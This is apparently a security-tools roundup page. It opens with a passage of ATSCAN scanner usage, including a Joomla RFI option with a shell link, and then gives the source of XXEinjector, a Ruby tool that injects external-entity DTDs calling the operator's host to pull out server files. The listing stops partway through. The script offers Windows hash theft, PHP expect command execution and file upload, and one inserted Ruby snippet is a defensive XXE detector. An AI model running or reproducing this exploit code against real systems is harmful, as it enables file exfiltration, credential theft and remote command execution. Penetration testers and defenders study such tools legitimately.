-t [target/targets.txt] --xss/--lfi ...

Server:
Get Server sites: -t [ip] --level [value] --sites
Get Server wordpress sites: -t [ip] --level [value] --wp
Get Server joomla sites: -t [ip] --level [value] --joom
Get Server upload sites: -t [ip] --level [value] --upload
Get Server zip sites files: -t [ip] --level [value] --zip
WP Arbitrary File Download: -t [ip] --level [value] --wpadf
Joomla RFI: -t [ip] --level [1] --joomfri --shell [shell link]
Scan basic tcp (quick): -t [ip] --ports --basic tcp
Scan basic udp (quick): -t [ip] --ports --basic udp
Scan basic udp+tcp: -t [ip] --ports --basic udp+tcp
Scan complete tcp: -t [ip] --ports --all tcp
Scan complete udp: -t [ip] --ports --all udp
Scan complete udp+tcp: -t [ip] --ports --all udp+tcp
Scan range tcp: -t [ip] --ports --select tcp --start [value] --end [value]
Scan range udp: -t [ip] --ports --select udp --start [value] --end [value]
Scan range udp+tcp: -t [ip] --ports --select udp+tcp --start [value] --end [value]

Encode / Decode:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]

External Command:
--dork [dork/dorks.txt] --level [level] --command "curl -v --TARGET"
--dork [dork/dorks.txt] --level [level] --command "curl -v --FULL_TARGET"
-t [target/targets.txt] --level [level] --command "curl -v --TARGET"
-t [target/targets.txt] --command "curl -v --FULL_TARGET"

Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
perl atscan.pl

Update:
cd ATSCAN
git pull

Source : https://github.com/AlisamTechnology | Our Post Before

Updates XXEInjector – Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.


Latest change 19/1/2016:
+ XXEinjector.rb: all structure files changed.

XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.
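The out-of-band chain the tool relies on (a parameter entity fetched from the operator's host, which in turn defines the entities that carry file contents out over FTP, HTTP or gopher) leaves a recognisable footprint in the request, and so does the direct variant (a general entity declared with a SYSTEM URI). As an added defender-side example, not part of XXEinjector, the Ruby below classifies an inbound XML body for exactly those constructs, looking at the raw text and at up to two layers of URL decoding, since the tool injects into URIs, headers and form bodies either plain or URL-encoded. The sample bodies, the 203.0.113.10 address and the function names are constructed for this example.

```ruby
#!/usr/bin/env ruby
# Added example, not part of XXEinjector: flag the DTD constructs that
# out-of-band and direct XXE payloads depend on. All samples are constructed.
require 'uri'

# Constructed request bodies. 203.0.113.10 is a documentation-range address.
SAMPLES = {
  # parameter entity pulled from a remote host, then chained (%int;%trick;)
  oob_plain:   '<!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://203.0.113.10:80/file.dtd">%remote;%int;%trick;]><tag>x</tag>',
  # the same shape as it would travel URL-encoded inside a form field
  oob_encoded: 'xml=%3C%3Fxml+version%3D%221.0%22%3F%3E%3C%21DOCTYPE+m+%5B+%3C%21ENTITY+%25+remote+SYSTEM+' \
               '%22http%3A%2F%2F203.0.113.10%2Ffile.dtd%22%3E%25remote%3B%5D%3E%3Ctag%3Ex%3C%2Ftag%3E',
  # direct variant: a general entity reading a local file, echoed back between marks
  direct_file: '<!DOCTYPE m [ <!ENTITY direct SYSTEM "file:///etc/hostname">]><tag>UNIQUEMARK&direct;UNIQUEMARK</tag>',
  # internal entity only: legitimate DTD use that must not be blocked
  benign:      '<?xml version="1.0"?><!DOCTYPE note [ <!ENTITY author "Alice"> ]><note>&author;</note>',
  no_dtd:      '<?xml version="1.0"?><order><id>42</id></order>'
}.freeze

# Return the raw text plus up to two layers of URL decoding, so a payload
# carried in a query string or form field is inspected in decoded form too.
def candidate_views(raw)
  views = [raw]
  current = raw
  2.times do
    begin
      decoded = URI.decode_www_form_component(current)
    rescue ArgumentError
      break # a "%" that is not an escape (e.g. "%remote;"): nothing left to unwrap
    end
    break if decoded == current
    views << decoded
    current = decoded
  end
  views
end

# Classify one body. external_parameter_entity is the out-of-band hallmark
# (<!ENTITY % name SYSTEM ...>); external_general_entity plus its scheme list
# is the direct-retrieval hallmark (<!ENTITY name SYSTEM "file:...">).
def classify_xml(raw)
  result = { doctype: false, external_parameter_entity: false,
             external_general_entity: false, schemes: [] }
  candidate_views(raw).each do |view|
    result[:doctype] ||= view.match?(/<!DOCTYPE\b/i)
    result[:external_parameter_entity] ||=
      view.match?(/<!ENTITY\s+%\s*[\w.-]+\s+(?:SYSTEM|PUBLIC)\b/i)
    view.scan(/<!ENTITY\s+[\w.-]+\s+SYSTEM\s+["']([a-z][a-z0-9+.-]*):/i).flatten.each do |scheme|
      result[:external_general_entity] = true
      result[:schemes] |= [scheme.downcase]
    end
  end
  result
end

# Reject anything that asks the parser to fetch an external resource.
def block?(raw)
  r = classify_xml(raw)
  r[:external_parameter_entity] || r[:external_general_entity]
end

# Verdict per sample name, e.g. { oob_plain: true, benign: false, ... }
def audit(samples)
  samples.transform_values { |body| block?(body) }
end

if __FILE__ == $0
  audit(SAMPLES).each { |name, blocked| puts "#{name.to_s.ljust(12)} #{blocked ? 'BLOCK' : 'allow'}" }
end
```

The classifier is a compensating control for logging and alerting; the actual fix is to configure the XML parser so it neither loads DTDs nor resolves external entities, which removes both the out-of-band and the direct path regardless of how the payload is encoded.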

Usage:

git clone https://github.com/enjoiz/XXEinjector && cd XXEinjector
ruby XXEinjector.rb

Updates:
cd XXEinjector
git pull

XXEinjector.rb script:

#!/usr/bin/env ruby

require 'socket'
require 'fileutils'
require 'uri'
require 'net/http'
require 'net/https'
require 'base64'
require 'readline'

# CONFIGURE
host = "" # our external ip
$path = "" # path to enumerate
$file = "" # file with vulnerable HTTP request
$secfile = "" # file with second request (2nd order)
enum = "ftp" # which out of band protocol should be used for file retrieval - ftp/http/gopher
$logger = "n" # only log requests, do not send anything

$proto = "http" # protocol to use - http/https
$proxy = "" # proxy host
$proxy_port = "" # proxy port

enumports = "" # which ports should be checked if they are unfiltered for reverse connections
phpfilter = "n" # if yes php filter will be used to base64 encode file content - y/n
$urlencode = "n" # if injected DTD should be URL encoded
enumall = "n" # if yes XXEinjector will not ask what to enum (prone to false positives) - y/n
$brute = "" # file with paths to bruteforce
$direct = "" # if direct exploitation should be used, this parameter should contain unique mark between which results are returned

hashes = "n" # steal Windows hashes
upload = "" # upload this file into temp directory using Java jar schema
expect = "" # command that gets executed using PHP expect
$xslt = "n" # tests for XSLT

$test = false # test mode, shows only payload
$dtdi = "y" # if yes then DTD is injected automatically
$rproto = "file" # file or netdoc protocol to retrieve data
$output = "brute.log" # output file for brute and logger modes
$verbose = "n" # verbose messaging
timeout = 10 # timeout for receiving responses
$contimeout = 30 # timeout used to close connection with server

$port = 0 # remote host application port
$remote = "" # remote host URL/IP address

http_port = 80 # http port that receives file contents/directory listings and serves XML files
ftp_port = 21 # ftp port that receives file contents/directory listings
gopher_port = 70 # gopher port that receives file contents/directory listings
jar_port = 1337 # port accepts connections and then sends files
xslt_port = 1337 # port that is used to test for XSLT injection

# holds HTTP responses
$response = ""
# regex to find directory listings
$regex = /^[$.\-_~ 0-9A-Za-z]+$/
# array that holds filenames to enumerate
$filenames = Array.new
# temp path holders - hold next filenames in different formats for enumeration
$nextpath = ""
enumpath = ""
$tmppath = ""
$directpath = ""
# array that contains skipped and allowed paths
blacklist = Array.new
whitelist = Array.new
# other variables
$method = "post" # HTTP method - get/post
cmp = "" # holds user input
switch = 0 # this switch locks enumeration if response is pending
i = 0 # main counter
$time = 1 # HTTP response timeout

# set all variables
ARGV.each do |arg|
	host = arg.split("=")[1] if arg.include?("--host=")
	$path = arg.split("=")[1] if arg.include?("--path=")
	$file = arg.split("=")[1] if arg.include?("--file=")
	enum = arg.split("=")[1] if arg.include?("--oob=")
	$proto = "https" if arg.include?("--ssl")
	$proxy = arg.split("=")[1].split(":")[0] if arg.include?("--proxy=")
	$proxy_port = arg.split("=")[1].split(":")[1] if arg.include?("--proxy=")
	phpfilter = "y" if arg.include?("--phpfilter")
	enumall = "y" if arg.include?("--fast")
	$brute = arg.split("=")[1] if arg.include?("--brute=")
	$verbose = "y" if arg.include?("--verbose")
	xslt_port = arg.split("=")[1] if arg.include?("--xsltport=")
	http_port = arg.split("=")[1] if arg.include?("--httpport=")
	ftp_port = arg.split("=")[1] if arg.include?("--ftpport=")
	gopher_port = arg.split("=")[1] if arg.include?("--gopherport=")
	jar_port = arg.split("=")[1] if arg.include?("--jarport=")
	timeout = Integer(arg.split("=")[1]) if arg.include?("--timeout=")
	hashes = "y" if arg.include?("--hashes")
	upload = arg.split("=")[1] if arg.include?("--upload=")
	expect = arg.split("=")[1] if arg.include?("--expect=")
	enumports = arg.split("=")[1] if arg.include?("--enumports=")
	$urlencode = "y" if arg.include?("--urlencode")
	$dtdi = "n" if arg.include?("--nodtd")
	$xslt = "y" if arg.include?("--xslt")
	$direct = arg.split("=")[1] if arg.include?("--direct=")
	$logger = "y" if arg.include?("--logger")
	$brute = "logger" if arg.include?("--logger")
	$output = arg.split("=")[1] if arg.include?("--output=")
	$secfile = arg.split("=")[1] if arg.include?("--2ndfile=")
	$rproto = "netdoc" if arg.include?("--netdoc")
	$contimeout = Integer(arg.split("=")[1]) if arg.include?("--contimeout=")
	$port = Integer(arg.split("=")[1]) if arg.include?("--rport=")
	$remote = arg.split("=")[1] if arg.include?("--rhost=")
	$test = true if arg.include?("--test")
end

# show DTD to inject
if ARGV.include? "--dtd"
	if host == ""
		host = "YOUR_HOST"
	end
	if http_port == ""
		http_port = "HTTPPORT"
	end
	puts ""
	puts "<!DOCTYPE m [ <!ENTITY % remote SYSTEM \"http://#{host}:#{http_port}/file.dtd\">%remote;%int;%trick;]>"
	puts ""
	exit(1)

# show sample direct exploitation XML
elsif ARGV.include? "--xml"
	puts ""
	puts "<!DOCTYPE m [ <!ENTITY direct SYSTEM \"XXEINJECT\">]><tag>UNIQUEMARK&direct;UNIQUEMARK</tag>"
	puts ""
	exit(1)

# show main menu
elsif ARGV.nil? || (ARGV.size < 3 && $logger == "n") || (host == "" && $direct == "" && $logger == "n") || ($file == "" && $logger == "n") || ($path == "" && $brute == "" && hashes == "n" && upload == "" && expect == "" && enumports == "" && $xslt == "n" && $logger == "n")
	puts "XXEinjector by Jakub Pa\u0142aczy\u0144ski"
	puts ""
	puts "XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications."
	puts ""
	puts "Options:"
	puts "  --host	Mandatory - our IP address for reverse connections. (--host=192.168.0.2)"
	puts "  --file	Mandatory - file containing valid HTTP request with xml. You can also mark with \"XXEINJECT\" a point where DTD should be injected. (--file=/tmp/req.txt)"
	puts "  --path	Mandatory if enumerating directories - Path to enumerate. (--path=/etc)"
	puts "  --brute	Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt)"
	puts "  --logger	Log results only. Do not send requests. HTTP logger looks for \"p\" parameter with results."
	puts ""
	puts "  --rhost	Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3)"
	puts "  --rport	Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080)"
	puts ""
	puts "  --oob		Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher)"
	puts "  --direct	Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK)"
	puts "  --2ndfile	File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)"
	puts "  --phpfilter	Use PHP filter to base64 encode target file before sending."
	puts "  --netdoc	Use netdoc protocol instead of file (Java)."
	puts "  --enumports	Enumerating unfiltered ports for reverse connection. Specify value \"all\" to enumerate all TCP ports. (--enumports=21,22,80,443,445)"
	puts ""
	puts "  --hashes	Steals Windows hash of the user that runs an application."
	puts "  --expect	Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls)"
	puts "  --upload	Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt)"
	puts "  --xslt	Tests for XSLT injection."
	puts ""
	puts "  --ssl		Use SSL."
	puts "  --proxy	Proxy to use. (--proxy=127.0.0.1:8080)"
	puts "  --httpport	Set custom HTTP port. (--httpport=80)"
	puts "  --ftpport	Set custom FTP port. (--ftpport=21)"
	puts "  --gopherport	Set custom gopher port. (--gopherport=70)"
	puts "  --jarport	Set custom port for uploading files using jar. (--jarport=1337)"
	puts "  --xsltport	Set custom port for XSLT injection test. (--xsltport=1337)"
	puts ""
	puts "  --test	This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server."
	puts "  --urlencode	URL encode injected DTD. This is default for URI."
	puts "  --nodtd	If you want to put DTD in request by yourself. Specify \"--dtd\" to show how DTD should look like."
	puts "  --output	Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt)"
	puts "  --timeout	Timeout for receiving file/directory content. (--timeout=20)"
	puts "  --contimeout	Timeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20)"
	puts "  --fast	Skip asking what to enumerate. Prone to false-positives."
	puts "  --verbose	Show verbose messages."
	puts ""
	puts "Example usage:"
	puts "  Enumerating /etc directory in HTTPS application:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl"
	puts "  Enumerating /etc directory using gopher for OOB method:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher"
	puts "  Second order exploitation:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt"
	puts "  Bruteforcing files using HTTP out of band method and netdoc protocol:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc"
	puts "  Enumerating using direct exploitation:"
	puts "  ruby #{__FILE__} --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK"
	puts "  Enumerating unfiltered ports:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --enumports=all"
	puts "  Stealing Windows hashes:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --hashes"
	puts "  Uploading files using Java jar:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf"
	puts "  Executing system commands using PHP expect:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls"
	puts "  Testing for XSLT injection:"
	puts "  ruby #{__FILE__} --host=192.168.0.2 --file=/tmp/req.txt --xslt"
	puts "  Log requests only:"
	puts "  ruby #{__FILE__} --logger --oob=http --output=/tmp/out.txt"
	puts ""
	exit(1)
else
	puts "XXEinjector by Jakub Pa\u0142aczy\u0144ski"
	puts ""
end

# EXECUTION

### Processing Request File ###

# Configure basic options

# set proxy
if $proxy == ""
	$proxy = nil
	$proxy_port = nil
end

# get connection host and port
if $logger == "n"
	z = 1
	loop do
		break if File.readlines($file)[z].chomp.empty?
		if File.readlines($file)[z].include?("Host: ")
			$remote = File.readlines($file)[z].split(" ")[1]
			if $remote.include?(":")
				$port = $remote.split(":")[1]
				$remote = $remote.split(":")[0]
			end
		end
		z = z + 1
	end
	if $port == 0
		if $proto == "http"
			$port = 80
		else
			$port = 443
		end	
	end
end

# Configure main request
def configreq()

	found = 0 # for detecting injected DTD

	# check HTTP method
	if File.readlines($file)[0].include?("GET ")
		$method = "get"
	end

	# get URI path
	$uri = File.readlines($file)[0].split(" ")[1]
	if $dtdi == "y"
		turi = URI.decode($uri).gsub("+", " ")
		if turi.include?("XXEINJECT")
			if $direct != ""
				$uri = $uri.sub("XXEINJECT", $rproto + ":///#{$directpath}")
			elsif $xslt == "n"
				$uri = $uri.sub("XXEINJECT", URI.encode($dtd).gsub("%20", "+"))
			else
				$uri = $uri.sub("XXEINJECT", URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
			end
			puts "DTD injected." if $verbose == "y"
			found = found + 1
		elsif turi.include?("<?xml")
			if $xslt == "n"
				$uri = $uri.sub("?>", "?>" + URI.encode($dtd).gsub("%20", "+"))
				$uri = $uri.sub(/(\?%3e)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
				$uri = $uri.sub(/(%3f>)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
				$uri = $uri.sub(/(%3f%3e)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
				puts "DTD injected." if $verbose == "y"
				found = found + 1
			else
				if turi.match(/(\<\?xml)(.*)(&)/i)
					$uri = $uri.sub(/(\<\?xml)(.*)(&)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$uri = $uri.sub(/(%3c%3fxml)(.*)(&)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$uri = $uri.sub(/(%3c\?xml)(.*)(&)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$uri = $uri.sub(/(\<%3fxml)(.*)(&)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
				elsif turi.match(/(\<\?xml)(.*)/i)
					$uri = $uri.sub(/(\<\?xml)(.*)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$uri = $uri.sub(/(%3c%3fxml)(.*)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$uri = $uri.sub(/(%3c\?xml)(.*)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$uri = $uri.sub(/(\<%3fxml)(.*)/i, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
				end
				puts "DTD injected." if $verbose == "y"
				found = found + 1
			end
		end
	end

	# get headers
	i = 1
	$headers = Hash.new
	loop do
		break if File.readlines($file)[i].chomp.empty?
		if !File.readlines($file)[i].include?("Host: ")
			header = File.readlines($file)[i].chomp
			if $dtdi == "y"
				if header.include?("XXEINJECT")
					if $direct != ""
						header = header.sub("XXEINJECT", $rproto + ":///#{$directpath}")
					elsif $urlencode == "y"
						if $xslt == "n"
							header = header.sub("XXEINJECT", URI.encode($dtd).gsub("%20", "+").gsub(";", "%3B"))
						else
							header = header.sub("XXEINJECT", URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D").gsub(";", "%3B"))
						end
					else
						if $xslt == "n"
							header = header.sub("XXEINJECT", $dtd)
						else
							header = header.sub("XXEINJECT", $xsl)
						end
					end
					puts "DTD injected." if $verbose == "y"
					found = found + 1
				end
			end
			unless header.include?("Accept-Encoding") && $direct != ""
				$headers[header.split(": ")[0]] = header.split(": ")[1]
			end
		end
		i = i + 1
	end

	# get POST body
	i = i + 1
	$post = ""
	postfind = 0
	if $method == "post"
		loop do
			break if File.readlines($file)[i].nil?
			postline = File.readlines($file)[i]
			if $dtdi == "y"
				tline = URI.decode(postline).gsub("+", " ")
				if tline.include?("XXEINJECT") && $xslt == "n"
					if $direct != ""
						postline = postline.sub("XXEINJECT", $rproto + ":///#{$directpath}")
					elsif $urlencode == "y"
						if $xslt == "n"
							postline = postline.sub("XXEINJECT", URI.encode($dtd).gsub("%20", "+"))
						else
							postline = postline.sub("XXEINJECT", URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
						end
					else
						if $xslt == "n"
							postline = postline.sub("XXEINJECT", $dtd)
						else
							postline = postline.sub("XXEINJECT", $xsl)
						end
					end
					puts "DTD injected." if $verbose == "y"
					found = found + 1
				elsif tline.include?("XXEINJECT") && $xslt == "y"
					postfind = 1
				elsif tline.include?("<?xml") && $xslt == "n"
					if $urlencode == "y"
						postline = postline.sub("?>", "?>" + URI.encode($dtd).gsub("%20", "+"))
						postline = postline.sub(/(\?%3e)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
						postline = postline.sub(/(%3f>)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
						postline = postline.sub(/(%3f%3e)/i, '\1' + URI.encode($dtd).gsub("%20", "+"))
					else
						postline = postline.sub("?>", "?>" + $dtd)
						postline = postline.sub(/(\?%3e)/i, '\1' + $dtd)
						postline = postline.sub(/(%3f>)/i, '\1' + $dtd)
						postline = postline.sub(/(%3f%3e)/i, '\1' + $dtd)
					end
					puts "DTD injected." if $verbose == "y"
					found = found + 1
				elsif tline.include?("<?xml") && $xslt == "y"
					postfind = 1
				end
			end
			$post += postline
			i = i + 1
		end
		if postfind == 1
			if $urlencode == "y"
				if $post.match(/(\<\?xml)(.*)(&)/im) || $post.match(/(%3c%3fxml)(.*)(&)/im) || $post.match(/(%3c\?xml)(.*)(&)/im) || $post.match(/(\<%3fxml)(.*)(&)/im)
					$post = $post.sub(/(\<\?xml)(.*)(&)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$post = $post.sub(/(%3c%3fxml)(.*)(&)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$post = $post.sub(/(%3c\?xml)(.*)(&)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
					$post = $post.sub(/(\<%3fxml)(.*)(&)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D") + "&")
				elsif $post.match(/(\<\?xml)(.*)/im) || $post.match(/(%3c%3fxml)(.*)/im) || $post.match(/(%3c\?xml)(.*)/im) || $post.match(/(\<%3fxml)(.*)/im)
					$post = $post.sub(/(\<\?xml)(.*)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$post = $post.sub(/(%3c%3fxml)(.*)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$post = $post.sub(/(%3c\?xml)(.*)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
					$post = $post.sub(/(\<%3fxml)(.*)/im, URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
				else
					$post = $post.sub("XXEINJECT", URI.encode($xsl).gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
				end
				puts "DTD injected." if $verbose == "y"
				found = found + 1
			else
				if $post.match(/(\<\?xml)(.*)(&)/im) || $post.match(/(%3c%3fxml)(.*)(&)/im) || $post.match(/(%3c\?xml)(.*)(&)/im) || $post.match(/(\<%3fxml)(.*)(&)/im)
					$post = $post.sub(/(\<\?xml)(.*)(&)/im, $xsl + "&")
					$post = $post.sub(/(%3c%3fxml)(.*)(&)/im, $xsl + "&")
					$post = $post.sub(/(%3c\?xml)(.*)(&)/im, $xsl + "&")
					$post = $post.sub(/(\<%3fxml)(.*)(&)/im, $xsl + "&")
				elsif $post.match(/(\<\?xml)(.*)/im) || $post.match(/(%3c%3fxml)(.*)/im) || $post.match(/(%3c\?xml)(.*)/im) || $post.match(/(\<%3fxml)(.*)/im)
					$post = $post.sub(/(\<\?xml)(.*)/im, $xsl)
					$post = $post.sub(/(%3c%3fxml)(.*)/im, $xsl)
					$post = $post.sub(/(%3c\?xml)(.*)/im, $xsl)
					$post = $post.sub(/(\<%3fxml)(.*)/im, $xsl)
				else
					$post = $post.sub("XXEINJECT", $xsl.gsub("%20", "+").gsub("?", "%3F").gsub("=", "%3D"))
				end
				puts "DTD injected." if $verbose == "y"
				found = found + 1
			end
		end
	end

	# update Content-Length header
	if $method == "post"
		$headers["Content-Length"] = String($post.bytesize)
	end

	# detect injected DTD
	if found == 0 && $dtdi == "y"
		puts "Automatic DTD injection was not successful. Please put \"XXEINJECT\" in request file where DTD should be placed or run XXEinjector with --nodtd if DTD was placed manually."
		exit(1)
	elsif found > 1
		puts "Multiple instances of XML found. It may results in false-positives."
	end

	# configuring request
	$request = Net::HTTP.new($remote, $port, $proxy, $proxy_port)

	# set HTTPS
	if $proto == "https"
		$request.use_ssl = true
		$request.verify_mode = OpenSSL::SSL::VERIFY_NONE
	end
end

### End of Processing Request File ###

### Configure request for 2nd order case ###
if $secfile != ""

	# check HTTP method
	if File.readlines($secfile)[0].include?("GET ")
		$secmethod = "get"
	end

	# get URI path
	$securi = File.readlines($secfile)[0].split(" ")[1]

	# get headers
	y = 1
	$secheaders = Hash.new
	loop do
		break if File.readlines($secfile)[y].chomp.empty?
		if !File.readlines($secfile)[y].include?("Host: ")
			header = File.readlines($secfile)[y].chomp
			unless header.include?("Accept-Encoding")
				$secheaders[header.split(": ")[0]] = header.split(": ")[1]
			end
		end
		y = y + 1
	end

	# get POST body
	y = y + 1
	$secpost = ""
	if $method == "post"
		loop do
			break if File.readlines($secfile)[y].nil?
			postline = File.readlines($secfile)[y]
			$secpost += postline
			y = y + 1
		end
	end

	# configuring 2nd request
	$secrequest = Net::HTTP.new($remote, $port, $proxy, $proxy_port)

	# set HTTPS
	if $proto == "https"
		$secrequest.use_ssl = true
		$secrequest.verify_mode = OpenSSL::SSL::VERIFY_NONE
	end
end

### End of Processing 2nd Request File ###

# Sending request
def sendreq()

	if $test == true
		puts "URL:"
		if $proto == "http"
			puts "http://#{$remote}:#{$port}#{$uri}"
		else
			puts "https://#{$remote}:#{$port}#{$uri}"
		end
		puts "\nHeaders:"
		puts $headers
		if $method == "post"
			puts "\nPOST body:"
			puts $post
		end
		exit(1)
	end
	
	if $verbose == "y"
		puts "Sending request with malicious XML:"
		if $proto == "http"
			puts "http://#{$remote}:#{$port}#{$uri}"
			puts $headers
			puts "\n"
			puts $post
			puts "\n"
		else
			puts "https://#{$remote}:#{$port}#{$uri}"
			puts $headers
			puts "\n"
			puts $post
			puts "\n"
		end
	else
		puts "Sending request with malicious XML."
	end

	$response = ""
	$request.start { |r|
		begin
			status = Timeout::timeout($time) {
				if $method == "post"
					$response = r.post($uri, $post, $headers)
				else
					$response = r.get($uri, $headers)
				end
			}
		rescue Timeout::Error
		end
	}
end

# Sending second request
def send2ndreq()
	
	if $verbose == "y"
		puts "Sending second request:"
		if $proto == "http"
			puts "http://#{$remote}:#{$port}#{$securi}"
			puts $secheaders
			puts "\n"
			puts $secpost
			puts "\n"
		else
			puts "https://#{$remote}:#{$port}#{$securi}"
			puts $secheaders
			puts "\n"
			puts $secpost
			puts "\n"
		end
	else
		puts "Sending second request."
	end
	
	$response = ""
	$secrequest.start { |r|
		begin
			status = Timeout::timeout($time) {
				if $method == "post"
					$response = r.post($securi, $secpost, $secheaders)
				else
					$response = r.get($securi, $secheaders)
				end
			}
		rescue Timeout::Error
		end
	}
end

# logging to separate file or output file if in bruteforce mode
def log(param)
	if $brute == ""
		logpath = "#{$path}"
		if $direct == ""
			if $tmppath != "" && logpath[-1] != "/"
				logpath += "/"
			end
			logpath += "#{$tmppath}"
		else
			if $nextpath != "" && logpath[-1] != "/"
				logpath += "/"
			end
			logpath += "#{$nextpath}"
		end
		logpath = logpath.gsub('\\','/')
		logpath[0] = "" if logpath[0] == "/"
		logpath[-1] = "" if logpath[-1] == "/"
		if $tmppath != ""
			FileUtils.mkdir_p "Logs/" + $remote + "/" + logpath.split("/")[0..-2].join('/')
		else
			if logpath.include?("/")
				FileUtils.mkdir_p "Logs/" + $remote + "/" + logpath.split("/")[0..-2].join('/')
			else
				FileUtils.mkdir_p "Logs/" + $remote + "/" + logpath
			end
		end
		if $done == 0
			if $cut == 1
				puts "Successfully logged file: /#{logpath}"
			else
				if logpath[-1] == ":"
					puts "Successfully logged file: #{logpath}/"
				else
					puts "Successfully logged file: #{logpath}"
				end
			end
			$done = 1
		end
		if logpath == ""
			log = File.open("Logs/" + $remote + "/" + "rootdir.log", "a")
		else
			log = File.open("Logs/" + $remote + "/" + "#{logpath}.log", "a")
		end
		log.write param
		log.close
	else
		log = File.open($output, "a")
		log.write param
		puts "Next results:\n#{param}\n" if $logger == "y" || $verbose == "y"
		print "> " if $logger == "y"
		log.close
	end
end

# pushing enumerated items to an array
def pusharr(param)
	if $brute == ""
		param = param.chomp
		if param.match $regex
			if $direct == ""
				logp = $tmppath
				if $tmppath != ""
					logp += "/"
				end
			else
				logp = $nextpath
				if $nextpath != ""
					logp += "/"
				end
			end
			logp += param
			$filenames.push(logp)
			puts "Path pushed to array: #{logp}" if $verbose == "y"
		end
	end
end

# initial changes
# set longer timeout for direct exploitation
if $direct != ""
	$time = 30
end

# Remove first slash if unix-like path specified
$cut = 0
if $path[0] == "/"
	$path[0] = ''
	$cut = 1
end

# Remove slash at the end if not Windows drive
if $path[-1] == "/" && $path[-2] != ":"
	$path[-1] = ''
end

# Add some changes to Windows path
if $cut == 0
	$path += '/' if $path[-1] == ":"
	$path = $path.gsub("\\", "/")
end

# configure payloads
# DTD to inject
$dtd = "<!DOCTYPE convert [ <!ENTITY % remote SYSTEM \"http://#{host}:#{http_port}/file.dtd\">%remote;%int;%trick;]>"
# XSL to inject
$xsl = "<?xml version=\"1.0\"?><xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"><xsl:template match=\"/\"><xsl:variable name=\"cmd\" select=\"document('http://#{host}:#{xslt_port}/success')\"/><xsl:value-of select=\"$cmd\"/></xsl:template></xsl:stylesheet>"

# Starting servers
begin
	if ($xslt == "n" && enumports == "" && $direct == "" && $logger == "n") || ($logger == "y" && enum == "http")
		http = TCPServer.new http_port
	end
	if enum == "ftp" && $xslt == "n" && enumports == "" && $direct == ""
		ftp = TCPServer.new ftp_port
	end
